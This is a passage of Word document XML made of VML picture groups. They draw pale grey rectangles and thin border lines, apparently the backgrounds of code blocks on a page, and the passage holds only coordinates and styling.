9823,2680,10039,2680,10260,2680,10484,2680,10484,2680,10484,2680,10484,2680,10484,2680,10484,2680,10484,2680,10484,2680,10484,2680,10484,2680,10484,2681,10484,2681,10484,2681,10484,2681,10484,2681,10484,2681,10484,2681,10484,2681,10484,2681,10484,2682,10484,2682,10484,2682,10484,2682,10484,2683,10484,2683,10484,2683,10484,2684,10484,2684,10484,2685,10484,2685,10484,2686,10484,2686,10484,2687,10484,2688,10484,2688,10484,2689,10484,2690,10484,2691,10484,2692,10484,2693,10484,2694,10484,2695,10484,2696,10484,2697,10484,2698,10484,2699,10484,2701,10484,2702,10484,2703,10484,2705,10484,2707,10484,2708,10484,2710,10484,2712,10484,2713,10484,2715,10484,2717,10484,2719,10484,2722,10484,2724,10484,2726,10484,2728,10484,2731,10484,2733,10484,2736,10484,2739,10484,2741,10484,2744,10484,2747,10484,2750,10484,2753,10484,2757,10484,2760,10484,2763,10484,2767,10484,2771,10484,2774,10484,2778,10484,2782,10484,2786,10484,2790,10484,2794,10484,2799,10484,2803,10484,2808,10484,2812,10484,2817,10484,2822,10484,2827,10484,2832,10484,2837,10484,2843,10484,2848,10484,2854,10484,2859,10484,2865,10484,2871,10484,2877,10484,2884,10484,2890,10484,2896,10484,2903,10484,2910,10484,2917,10484,2924,10484,2931,10484,2938,10484,2946,10484,2953,10484,2961,10484,2969,10484,2977,10484,2985,10484,2993,10484,3002,10484,3010,10484,3019,10484,3028,10484,3037,10484,3046,10484,3056,10484,3056,10484,3056,10484,3056,10484,3056,10484,3056,10484,3056,10483,3056,10482,3056,10482,3056,10480,3056,10479,3056,10477,3056,10475,3056,10473,3056,10470,3056,10466,3056,10462,3056,10458,3056,10453,3056,10448,3056,10442,3056,10435,3056,10428,3056,10419,3056,10411,3056,10401,3056,10391,3056,10379,3056,10367,3056,10354,3056,10340,3056,10326,3056,10310,3056,10293,3056,10275,3056,10256,3056,10236,3056,10215,3056,10192,3056,10168,3056,10143,3056,10117,3056,10090,3056,10061,3056,10031,3056,9999,3056,9966,3056,9931,3056,9895,3056,9858,3056,9819,3056,9778,3056,9735,3056,9691,3056,9646,3056,9598,3056,9549,3056,9498,3056,9445,3056,9391,3056,9334,3056,9275,3056,9215,3056,9153,3056,9088,3056,9022,3056,8953,3056,8883,3056,8810,3056,8735,3056,8658,3056,8578,3056,8497,3056,8413,3056,8326,3056,8238,3056,8146,3056,8053,3056,7957,3056,7859,3056,7758,3056,7654,3056,7548,3056,7439,3056,7328,3056,7214,3056,7097,3056,6977,3056,6855,3056,6730,3056,6602,3056,6471,3056,6337,3056,6201,3056,6061,3056,5918,3056,5773,3056,5624,3056,5472,3056,5317,3056,5159,3056,4997,3056,4833,3056,4665,3056,4494,3056,4319,3056,4141,3056,3960,3056,3776,3056,3587,3056,3396,3056,3201,3056,3002,3056,2800,3056,2594,3056,2385,3056,2172,3056,1955,3056,1734,3056,1510,3056,1510,3056,1510,3056,1510,3056,1510,3056,1510,3056,1510,3056,1510,3055,1510,3055,1510,3055,1510,3055,1510,3055,1510,3055,1510,3055,1510,3055,1510,3055,1510,3055,1510,3055,1510,3054,1510,3054,1510,3054,1510,3054,1510,3053,1510,3053,1510,3053,1510,3052,1510,3052,1510,3052,1510,3051,1510,3051,1510,3050,1510,3050,1510,3049,1510,3048,1510,3048,1510,3047,1510,3046,1510,3045,1510,3044,1510,3043,1510,3042,1510,3041,1510,3040,1510,3039,1510,3038,1510,3037,1510,3035,1510,3034,1510,3032,1510,3031,1510,3029,1510,3028,1510,3026,1510,3024,1510,3022,1510,3020,1510,3018,1510,3016,1510,3014,1510,3012,1510,3010,1510,3007,1510,3005,1510,3002,1510,3000,1510,2997,1510,2994,1510,2992,1510,2989,1510,2986,1510,2982,1510,2979,1510,2976,1510,2972,1510,2969,1510,2965,1510,2962,1510,2958,1510,2954,1510,2950,1510,2946,1510,2942,1510,2937,1510,2933,1510,2928,1510,2924,1510,2919,1510,2914,1510,2909,1510,2904,1510,2899,1510,2893,1510,2888,1510,2882,1510,2876,1510,2871,1510,2865,1510,2859,1510,2852,1510,2846,1510,2840,1510,2833,1510,2826,1510,2819,1510,2812,1510,2805,1510,2798,1510,2790,1510,2783,1510,2775,1510,2767,1510,2759,1510,2751,1510,2743,1510,2734,1510,2726,1510,2717,1510,2708,1510,2699,1510,2690,1510,2680e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:133.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2670" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:2670;width:30;height:390" coordorigin="1490,2670" coordsize="30,390" path="m1517,2680l1517,2680,1517,2680,1517,2680,1517,2680,1517,2680,1517,2680,1517,2680,1517,2680,1517,2680,1517,2681,1517,2681,1517,2681,1517,2681,1517,2681,1517,2681,1517,2681,1517,2681,1517,2681,1517,2682,1517,2682,1517,2682,1517,2682,1517,2683,1517,2683,1517,2683,1517,2684,1517,2684,1517,2685,1517,2685,1517,2686,1517,2686,1517,2687,1517,2688,1517,2688,1517,2689,1517,2690,1517,2691,1517,2692,1517,2693,1517,2694,1517,2695,1517,2696,1517,2697,1517,2698,1517,2699,1517,2701,1517,2702,1517,2703,1517,2705,1517,2707,1517,2708,1517,2710,1517,2712,1517,2713,1517,2715,1517,2717,1517,2719,1517,2722,1517,2724,1517,2726,1517,2728,1517,2731,1517,2733,1517,2736,1517,2739,1517,2741,1517,2744,1517,2747,1517,2750,1517,2753,1517,2757,1517,2760,1517,2763,1517,2767,1517,2771,1517,2774,1517,2778,1517,2782,1517,2786,1517,2790,1517,2794,1517,2799,1517,2803,1517,2808,1517,2812,1517,2817,1517,2822,1517,2827,1517,2832,1517,2837,1517,2843,1517,2848,1517,2854,1517,2859,1517,2865,1517,2871,1517,2877,1517,2884,1517,2890,1517,2896,1517,2903,1517,2910,1517,2917,1517,2924,1517,2931,1517,2938,1517,2946,1517,2953,1517,2961,1517,2969,1517,2977,1517,2985,1517,2993,1517,3002,1517,3010,1517,3019,1517,3028,1517,3037,1517,3046,1517,3056e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:151.500pt;width:449.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3030" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:3030;width:8990;height:350" coordorigin="1490,3030" coordsize="8990,350" path="m1510,3056l1510,3056,1510,3056,1510,3056,1510,3056,1510,3056,1510,3056,1511,3056,1512,3056,1512,3056,1514,3056,1515,3056,1517,3056,1519,3056,1521,3056,1524,3056,1528,3056,1532,3056,1536,3056,1541,3056,1546,3056,1552,3056,1559,3056,1566,3056,1575,3056,1583,3056,1593,3056,1603,3056,1615,3056,1627,3056,1640,3056,1654,3056,1668,3056,1684,3056,1701,3056,1719,3056,1738,3056,1758,3056,1780,3056,1802,3056,1826,3056,1851,3056,1877,3056,1904,3056,1933,3056,1963,3056,1995,3056,2028,3056,2063,3056,2099,3056,2136,3056,2175,3056,2216,3056,2259,3056,2303,3056,2348,3056,2396,3056,2445,3056,2496,3056,2549,3056,2604,3056,2660,3056,2719,3056,2779,3056,2841,3056,2906,3056,2972,3056,3041,3056,3112,3056,3184,3056,3259,3056,3336,3056,3416,3056,3498,3056,3582,3056,3668,3056,3757,3056,3848,3056,3941,3056,4037,3056,4136,3056,4236,3056,4340,3056,4446,3056,4555,3056,4666,3056,4780,3056,4897,3056,5017,3056,5139,3056,5264,3056,5392,3056,5523,3056,5657,3056,5793,3056,5933,3056,6076,3056,6222,3056,6370,3056,6522,3056,6677,3056,6835,3056,6997,3056,7161,3056,7329,3056,7500,3056,7675,3056,7853,3056,8034,3056,8219,3056,8407,3056,8598,3056,8793,3056,8992,3056,9194,3056,9400,3056,9609,3056,9823,3056,10039,3056,10260,3056,10484,3056,10484,3056,10484,3056,10484,3056,10484,3056,10484,3056,10484,3056,10484,3056,10484,3056,10484,3056,10484,3056,10484,3056,10484,3056,10484,3056,10484,3056,10484,3056,10484,3056,10484,3056,10484,3057,10484,3057,10484,3057,10484,3057,10484,3057,10484,3058,10484,3058,10484,3058,10484,3059,10484,3059,10484,3059,10484,3060,10484,3060,10484,3061,10484,3061,10484,3062,10484,3063,10484,3063,10484,3064,10484,3065,10484,3065,10484,3066,10484,3067,10484,3068,10484,3069,10484,3070,10484,3071,10484,3072,10484,3073,10484,3075,10484,3076,10484,3077,10484,3079,10484,3080,10484,3082,10484,3083,10484,3085,10484,3086,10484,3088,10484,3090,10484,3092,10484,3094,10484,3096,10484,3098,10484,3100,10484,3102,10484,3105,10484,3107,10484,3109,10484,3112,10484,3114,10484,3117,10484,3120,10484,3123,10484,3126,10484,3129,10484,3132,10484,3135,10484,3138,10484,3142,10484,3145,10484,3149,10484,3152,10484,3156,10484,3160,10484,3164,10484,3168,10484,3172,10484,3176,10484,3180,10484,3185,10484,3189,10484,3194,10484,3198,10484,3203,10484,3208,10484,3213,10484,3218,10484,3224,10484,3229,10484,3234,10484,3240,10484,3246,10484,3251,10484,3257,10484,3263,10484,3270,10484,3276,10484,3282,10484,3289,10484,3296,10484,3302,10484,3309,10484,3316,10484,3323,10484,3331,10484,3338,10484,3346,10484,3354,10484,3361,10484,3369,10484,3377,10484,3386,10484,3386,10484,3386,10484,3386,10484,3386,10484,3386,10484,3386,10483,3386,10482,3386,10482,3386,10480,3386,10479,3386,10477,3386,10475,3386,10473,3386,10470,3386,10466,3386,10462,3386,10458,3386,10453,3386,10448,3386,10442,3386,10435,3386,10428,3386,10419,3386,10411,3386,10401,3386,10391,3386,10379,3386,10367,3386,10354,3386,10340,3386,10326,3386,10310,3386,10293,3386,10275,3386,10256,3386,10236,3386,10215,3386,10192,3386,10168,3386,10143,3386,10117,3386,10090,3386,10061,3386,10031,3386,9999,3386,9966,3386,9931,3386,9895,3386,9858,3386,9819,3386,9778,3386,9735,3386,9691,3386,9646,3386,9598,3386,9549,3386,9498,3386,9445,3386,9391,3386,9334,3386,9275,3386,9215,3386,9153,3386,9088,3386,9022,3386,8953,3386,8883,3386,8810,3386,8735,3386,8658,3386,8578,3386,8497,3386,8413,3386,8326,3386,8238,3386,8146,3386,8053,3386,7957,3386,7859,3386,7758,3386,7654,3386,7548,3386,7439,3386,7328,3386,7214,3386,7097,3386,6977,3386,6855,3386,6730,3386,6602,3386,6471,3386,6337,3386,6201,3386,6061,3386,5918,3386,5773,3386,5624,3386,5472,3386,5317,3386,5159,3386,4997,3386,4833,3386,4665,3386,4494,3386,4319,3386,4141,3386,3960,3386,3776,3386,3587,3386,3396,3386,3201,3386,3002,3386,2800,3386,2594,3386,2385,3386,2172,3386,1955,3386,1734,3386,1510,3386,1510,3386,1510,3386,1510,3386,1510,3386,1510,3386,1510,3386,1510,3386,1510,3386,1510,3386,1510,3386,1510,3386,1510,3385,1510,3385,1510,3385,1510,3385,1510,3385,1510,3385,1510,3385,1510,3385,1510,3384,1510,3384,1510,3384,1510,3384,1510,3383,1510,3383,1510,3383,1510,3382,1510,3382,1510,3381,1510,3381,1510,3380,1510,3380,1510,3379,1510,3379,1510,3378,1510,3377,1510,3377,1510,3376,1510,3375,1510,3374,1510,3373,1510,3372,1510,3371,1510,3370,1510,3369,1510,3368,1510,3367,1510,3365,1510,3364,1510,3363,1510,3361,1510,3360,1510,3358,1510,3357,1510,3355,1510,3353,1510,3351,1510,3349,1510,3347,1510,3345,1510,3343,1510,3341,1510,3339,1510,3337,1510,3334,1510,3332,1510,3329,1510,3327,1510,3324,1510,3321,1510,3319,1510,3316,1510,3313,1510,3309,1510,3306,1510,3303,1510,3300,1510,3296,1510,3293,1510,3289,1510,3285,1510,3282,1510,3278,1510,3274,1510,3270,1510,3265,1510,3261,1510,3257,1510,3252,1510,3248,1510,3243,1510,3238,1510,3233,1510,3228,1510,3223,1510,3218,1510,3212,1510,3207,1510,3201,1510,3196,1510,3190,1510,3184,1510,3178,1510,3172,1510,3165,1510,3159,1510,3152,1510,3146,1510,3139,1510,3132,1510,3125,1510,3118,1510,3110,1510,3103,1510,3095,1510,3088,1510,3080,1510,3072,1510,3064,1510,3056e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:152.500pt;width:1.500pt;height:16.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3050" coordsize="30,330">
        <v:shape style="position:absolute;left:1490;top:3050;width:30;height:330" coordorigin="1490,3050" coordsize="30,330" path="m1517,3056l1517,3056,1517,3056,1517,3056,1517,3056,1517,3056,1517,3056,1517,3056,1517,3056,1517,3056,1517,3056,1517,3056,1517,3056,1517,3056,1517,3056,1517,3056,1517,3056,1517,3056,1517,3057,1517,3057,1517,3057,1517,3057,1517,3057,1517,3058,1517,3058,1517,3058,1517,3059,1517,3059,1517,3059,1517,3060,1517,3060,1517,3061,1517,3061,1517,3062,1517,3063,1517,3063,1517,3064,1517,3065,1517,3065,1517,3066,1517,3067,1517,3068,1517,3069,1517,3070,1517,3071,1517,3072,1517,3073,1517,3075,1517,3076,1517,3077,1517,3079,1517,3080,1517,3082,1517,3083,1517,3085,1517,3086,1517,3088,1517,3090,1517,3092,1517,3094,1517,3096,1517,3098,1517,3100,1517,3102,1517,3105,1517,3107,1517,3109,1517,3112,1517,3114,1517,3117,1517,3120,1517,3123,1517,3126,1517,3129,1517,3132,1517,3135,1517,3138,1517,3142,1517,3145,1517,3149,1517,3152,1517,3156,1517,3160,1517,3164,1517,3168,1517,3172,1517,3176,1517,3180,1517,3185,1517,3189,1517,3194,1517,3198,1517,3203,1517,3208,1517,3213,1517,3218,1517,3224,1517,3229,1517,3234,1517,3240,1517,3246,1517,3251,1517,3257,1517,3263,1517,3270,1517,3276,1517,3282,1517,3289,1517,3296,1517,3302,1517,3309,1517,3316,1517,3323,1517,3331,1517,3338,1517,3346,1517,3354,1517,3361,1517,3369,1517,3377,1517,3386e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:168.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3370" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:3370;width:8990;height:390" coordorigin="1490,3370" coordsize="8990,390" path="m1510,3386l1510,3386,1510,3386,1510,3386,1510,3386,1510,3386,1510,3386,1511,3386,1512,3386,1512,3386,1514,3386,1515,3386,1517,3386,1519,3386,1521,3386,1524,3386,1528,3386,1532,3386,1536,3386,1541,3386,1546,3386,1552,3386,1559,3386,1566,3386,1575,3386,1583,3386,1593,3386,1603,3386,1615,3386,1627,3386,1640,3386,1654,3386,1668,3386,1684,3386,1701,3386,1719,3386,1738,3386,1758,3386,1780,3386,1802,3386,1826,3386,1851,3386,1877,3386,1904,3386,1933,3386,1963,3386,1995,3386,2028,3386,2063,3386,2099,3386,2136,3386,2175,3386,2216,3386,2259,3386,2303,3386,2348,3386,2396,3386,2445,3386,2496,3386,2549,3386,2604,3386,2660,3386,2719,3386,2779,3386,2841,3386,2906,3386,2972,3386,3041,3386,3112,3386,3184,3386,3259,3386,3336,3386,3416,3386,3498,3386,3582,3386,3668,3386,3757,3386,3848,3386,3941,3386,4037,3386,4136,3386,4236,3386,4340,3386,4446,3386,4555,3386,4666,3386,4780,3386,4897,3386,5017,3386,5139,3386,5264,3386,5392,3386,5523,3386,5657,3386,5793,3386,5933,3386,6076,3386,6222,3386,6370,3386,6522,3386,6677,3386,6835,3386,6997,3386,7161,3386,7329,3386,7500,3386,7675,3386,7853,3386,8034,3386,8219,3386,8407,3386,8598,3386,8793,3386,8992,3386,9194,3386,9400,3386,9609,3386,9823,3386,10039,3386,10260,3386,10484,3386,10484,3386,10484,3386,10484,3386,10484,3386,10484,3386,10484,3386,10484,3386,10484,3386,10484,3386,10484,3386,10484,3386,10484,3386,10484,3386,10484,3386,10484,3386,10484,3386,10484,3387,10484,3387,10484,3387,10484,3387,10484,3387,10484,3388,10484,3388,10484,3388,10484,3389,10484,3389,10484,3390,10484,3390,10484,3391,10484,3391,10484,3392,10484,3392,10484,3393,10484,3394,10484,3394,10484,3395,10484,3396,10484,3397,10484,3398,10484,3399,10484,3400,10484,3401,10484,3402,10484,3403,10484,3405,10484,3406,10484,3407,10484,3409,10484,3410,10484,3412,10484,3414,10484,3415,10484,3417,10484,3419,10484,3421,10484,3423,10484,3425,10484,3427,10484,3429,10484,3431,10484,3434,10484,3436,10484,3439,10484,3441,10484,3444,10484,3447,10484,3450,10484,3453,10484,3456,10484,3459,10484,3462,10484,3465,10484,3469,10484,3472,10484,3476,10484,3480,10484,3483,10484,3487,10484,3491,10484,3495,10484,3500,10484,3504,10484,3508,10484,3513,10484,3518,10484,3522,10484,3527,10484,3532,10484,3537,10484,3543,10484,3548,10484,3553,10484,3559,10484,3565,10484,3571,10484,3577,10484,3583,10484,3589,10484,3595,10484,3602,10484,3608,10484,3615,10484,3622,10484,3629,10484,3636,10484,3643,10484,3651,10484,3658,10484,3666,10484,3674,10484,3682,10484,3690,10484,3699,10484,3707,10484,3716,10484,3724,10484,3733,10484,3742,10484,3752,10484,3761,10484,3761,10484,3761,10484,3761,10484,3761,10484,3761,10484,3761,10483,3761,10482,3761,10482,3761,10480,3761,10479,3761,10477,3761,10475,3761,10473,3761,10470,3761,10466,3761,10462,3761,10458,3761,10453,3761,10448,3761,10442,3761,10435,3761,10428,3761,10419,3761,10411,3761,10401,3761,10391,3761,10379,3761,10367,3761,10354,3761,10340,3761,10326,3761,10310,3761,10293,3761,10275,3761,10256,3761,10236,3761,10215,3761,10192,3761,10168,3761,10143,3761,10117,3761,10090,3761,10061,3761,10031,3761,9999,3761,9966,3761,9931,3761,9895,3761,9858,3761,9819,3761,9778,3761,9735,3761,9691,3761,9646,3761,9598,3761,9549,3761,9498,3761,9445,3761,9391,3761,9334,3761,9275,3761,9215,3761,9153,3761,9088,3761,9022,3761,8953,3761,8883,3761,8810,3761,8735,3761,8658,3761,8578,3761,8497,3761,8413,3761,8326,3761,8238,3761,8146,3761,8053,3761,7957,3761,7859,3761,7758,3761,7654,3761,7548,3761,7439,3761,7328,3761,7214,3761,7097,3761,6977,3761,6855,3761,6730,3761,6602,3761,6471,3761,6337,3761,6201,3761,6061,3761,5918,3761,5773,3761,5624,3761,5472,3761,5317,3761,5159,3761,4997,3761,4833,3761,4665,3761,4494,3761,4319,3761,4141,3761,3960,3761,3776,3761,3587,3761,3396,3761,3201,3761,3002,3761,2800,3761,2594,3761,2385,3761,2172,3761,1955,3761,1734,3761,1510,3761,1510,3761,1510,3761,1510,3761,1510,3761,1510,3761,1510,3761,1510,3761,1510,3761,1510,3761,1510,3761,1510,3761,1510,3761,1510,3761,1510,3760,1510,3760,1510,3760,1510,3760,1510,3760,1510,3760,1510,3759,1510,3759,1510,3759,1510,3759,1510,3758,1510,3758,1510,3757,1510,3757,1510,3757,1510,3756,1510,3755,1510,3755,1510,3754,1510,3754,1510,3753,1510,3752,1510,3751,1510,3751,1510,3750,1510,3749,1510,3748,1510,3747,1510,3746,1510,3744,1510,3743,1510,3742,1510,3741,1510,3739,1510,3738,1510,3736,1510,3735,1510,3733,1510,3731,1510,3730,1510,3728,1510,3726,1510,3724,1510,3722,1510,3720,1510,3717,1510,3715,1510,3713,1510,3710,1510,3708,1510,3705,1510,3703,1510,3700,1510,3697,1510,3694,1510,3691,1510,3688,1510,3685,1510,3681,1510,3678,1510,3674,1510,3671,1510,3667,1510,3663,1510,3659,1510,3655,1510,3651,1510,3647,1510,3643,1510,3638,1510,3634,1510,3629,1510,3624,1510,3619,1510,3614,1510,3609,1510,3604,1510,3599,1510,3593,1510,3588,1510,3582,1510,3576,1510,3570,1510,3564,1510,3558,1510,3551,1510,3545,1510,3538,1510,3532,1510,3525,1510,3518,1510,3510,1510,3503,1510,3496,1510,3488,1510,3480,1510,3473,1510,3465,1510,3456,1510,3448,1510,3440,1510,3431,1510,3422,1510,3413,1510,3404,1510,3395,1510,3386e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:168.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3370" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:3370;width:30;height:390" coordorigin="1490,3370" coordsize="30,390" path="m1517,3386l1517,3386,1517,3386,1517,3386,1517,3386,1517,3386,1517,3386,1517,3386,1517,3386,1517,3386,1517,3386,1517,3386,1517,3386,1517,3386,1517,3386,1517,3386,1517,3386,1517,3387,1517,3387,1517,3387,1517,3387,1517,3387,1517,3388,1517,3388,1517,3388,1517,3389,1517,3389,1517,3390,1517,3390,1517,3391,1517,3391,1517,3392,1517,3392,1517,3393,1517,3394,1517,3394,1517,3395,1517,3396,1517,3397,1517,3398,1517,3399,1517,3400,1517,3401,1517,3402,1517,3403,1517,3405,1517,3406,1517,3407,1517,3409,1517,3410,1517,3412,1517,3414,1517,3415,1517,3417,1517,3419,1517,3421,1517,3423,1517,3425,1517,3427,1517,3429,1517,3431,1517,3434,1517,3436,1517,3439,1517,3441,1517,3444,1517,3447,1517,3450,1517,3453,1517,3456,1517,3459,1517,3462,1517,3465,1517,3469,1517,3472,1517,3476,1517,3480,1517,3483,1517,3487,1517,3491,1517,3495,1517,3500,1517,3504,1517,3508,1517,3513,1517,3518,1517,3522,1517,3527,1517,3532,1517,3537,1517,3543,1517,3548,1517,3553,1517,3559,1517,3565,1517,3571,1517,3577,1517,3583,1517,3589,1517,3595,1517,3602,1517,3608,1517,3615,1517,3622,1517,3629,1517,3636,1517,3643,1517,3651,1517,3658,1517,3666,1517,3674,1517,3682,1517,3690,1517,3699,1517,3707,1517,3716,1517,3724,1517,3733,1517,3742,1517,3752,1517,3761e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:187.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3750" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:3750;width:8990;height:370" coordorigin="1490,3750" coordsize="8990,370" path="m1510,3761l1510,3761,1510,3761,1510,3761,1510,3761,1510,3761,1510,3761,1511,3761,1512,3761,1512,3761,1514,3761,1515,3761,1517,3761,1519,3761,1521,3761,1524,3761,1528,3761,1532,3761,1536,3761,1541,3761,1546,3761,1552,3761,1559,3761,1566,3761,1575,3761,1583,3761,1593,3761,1603,3761,1615,3761,1627,3761,1640,3761,1654,3761,1668,3761,1684,3761,1701,3761,1719,3761,1738,3761,1758,3761,1780,3761,1802,3761,1826,3761,1851,3761,1877,3761,1904,3761,1933,3761,1963,3761,1995,3761,2028,3761,2063,3761,2099,3761,2136,3761,2175,3761,2216,3761,2259,3761,2303,3761,2348,3761,2396,3761,2445,3761,2496,3761,2549,3761,2604,3761,2660,3761,2719,3761,2779,3761,2841,3761,2906,3761,2972,3761,3041,3761,3112,3761,3184,3761,3259,3761,3336,3761,3416,3761,3498,3761,3582,3761,3668,3761,3757,3761,3848,3761,3941,3761,4037,3761,4136,3761,4236,3761,4340,3761,4446,3761,4555,3761,4666,3761,4780,3761,4897,3761,5017,3761,5139,3761,5264,3761,5392,3761,5523,3761,5657,3761,5793,3761,5933,3761,6076,3761,6222,3761,6370,3761,6522,3761,6677,3761,6835,3761,6997,3761,7161,3761,7329,3761,7500,3761,7675,3761,7853,3761,8034,3761,8219,3761,8407,3761,8598,3761,8793,3761,8992,3761,9194,3761,9400,3761,9609,3761,9823,3761,10039,3761,10260,3761,10484,3761,10484,3761,10484,3761,10484,3761,10484,3761,10484,3761,10484,3761,10484,3761,10484,3761,10484,3761,10484,3761,10484,3761,10484,3761,10484,3761,10484,3761,10484,3761,10484,3762,10484,3762,10484,3762,10484,3762,10484,3762,10484,3763,10484,3763,10484,3763,10484,3763,10484,3764,10484,3764,10484,3765,10484,3765,10484,3766,10484,3766,10484,3767,10484,3767,10484,3768,10484,3769,10484,3769,10484,3770,10484,3771,10484,3772,10484,3773,10484,3774,10484,3775,10484,3776,10484,3777,10484,3778,10484,3779,10484,3780,10484,3782,10484,3783,10484,3785,10484,3786,10484,3788,10484,3789,10484,3791,10484,3793,10484,3795,10484,3796,10484,3798,10484,3800,10484,3803,10484,3805,10484,3807,10484,3809,10484,3812,10484,3814,10484,3817,10484,3820,10484,3822,10484,3825,10484,3828,10484,3831,10484,3834,10484,3837,10484,3841,10484,3844,10484,3848,10484,3851,10484,3855,10484,3858,10484,3862,10484,3866,10484,3870,10484,3874,10484,3879,10484,3883,10484,3888,10484,3892,10484,3897,10484,3902,10484,3907,10484,3912,10484,3917,10484,3922,10484,3927,10484,3933,10484,3938,10484,3944,10484,3950,10484,3956,10484,3962,10484,3968,10484,3975,10484,3981,10484,3988,10484,3994,10484,4001,10484,4008,10484,4015,10484,4023,10484,4030,10484,4038,10484,4045,10484,4053,10484,4061,10484,4069,10484,4078,10484,4086,10484,4095,10484,4103,10484,4112,10484,4121,10484,4121,10484,4121,10484,4121,10484,4121,10484,4121,10484,4121,10483,4121,10482,4121,10482,4121,10480,4121,10479,4121,10477,4121,10475,4121,10473,4121,10470,4121,10466,4121,10462,4121,10458,4121,10453,4121,10448,4121,10442,4121,10435,4121,10428,4121,10419,4121,10411,4121,10401,4121,10391,4121,10379,4121,10367,4121,10354,4121,10340,4121,10326,4121,10310,4121,10293,4121,10275,4121,10256,4121,10236,4121,10215,4121,10192,4121,10168,4121,10143,4121,10117,4121,10090,4121,10061,4121,10031,4121,9999,4121,9966,4121,9931,4121,9895,4121,9858,4121,9819,4121,9778,4121,9735,4121,9691,4121,9646,4121,9598,4121,9549,4121,9498,4121,9445,4121,9391,4121,9334,4121,9275,4121,9215,4121,9153,4121,9088,4121,9022,4121,8953,4121,8883,4121,8810,4121,8735,4121,8658,4121,8578,4121,8497,4121,8413,4121,8326,4121,8238,4121,8146,4121,8053,4121,7957,4121,7859,4121,7758,4121,7654,4121,7548,4121,7439,4121,7328,4121,7214,4121,7097,4121,6977,4121,6855,4121,6730,4121,6602,4121,6471,4121,6337,4121,6201,4121,6061,4121,5918,4121,5773,4121,5624,4121,5472,4121,5317,4121,5159,4121,4997,4121,4833,4121,4665,4121,4494,4121,4319,4121,4141,4121,3960,4121,3776,4121,3587,4121,3396,4121,3201,4121,3002,4121,2800,4121,2594,4121,2385,4121,2172,4121,1955,4121,1734,4121,1510,4121,1510,4121,1510,4121,1510,4121,1510,4121,1510,4121,1510,4121,1510,4121,1510,4121,1510,4121,1510,4121,1510,4121,1510,4121,1510,4121,1510,4121,1510,4120,1510,4120,1510,4120,1510,4120,1510,4120,1510,4120,1510,4119,1510,4119,1510,4119,1510,4118,1510,4118,1510,4118,1510,4117,1510,4117,1510,4116,1510,4116,1510,4115,1510,4115,1510,4114,1510,4113,1510,4113,1510,4112,1510,4111,1510,4110,1510,4109,1510,4108,1510,4107,1510,4106,1510,4105,1510,4104,1510,4103,1510,4102,1510,4100,1510,4099,1510,4097,1510,4096,1510,4094,1510,4093,1510,4091,1510,4089,1510,4087,1510,4086,1510,4084,1510,4081,1510,4079,1510,4077,1510,4075,1510,4073,1510,4070,1510,4068,1510,4065,1510,4062,1510,4060,1510,4057,1510,4054,1510,4051,1510,4048,1510,4045,1510,4041,1510,4038,1510,4034,1510,4031,1510,4027,1510,4023,1510,4020,1510,4016,1510,4012,1510,4007,1510,4003,1510,3999,1510,3994,1510,3990,1510,3985,1510,3980,1510,3975,1510,3970,1510,3965,1510,3960,1510,3955,1510,3949,1510,3944,1510,3938,1510,3932,1510,3926,1510,3920,1510,3914,1510,3907,1510,3901,1510,3894,1510,3888,1510,3881,1510,3874,1510,3867,1510,3859,1510,3852,1510,3844,1510,3837,1510,3829,1510,3821,1510,3813,1510,3804,1510,3796,1510,3787,1510,3779,1510,3770,1510,3761e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:187.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3750" coordsize="30,370">
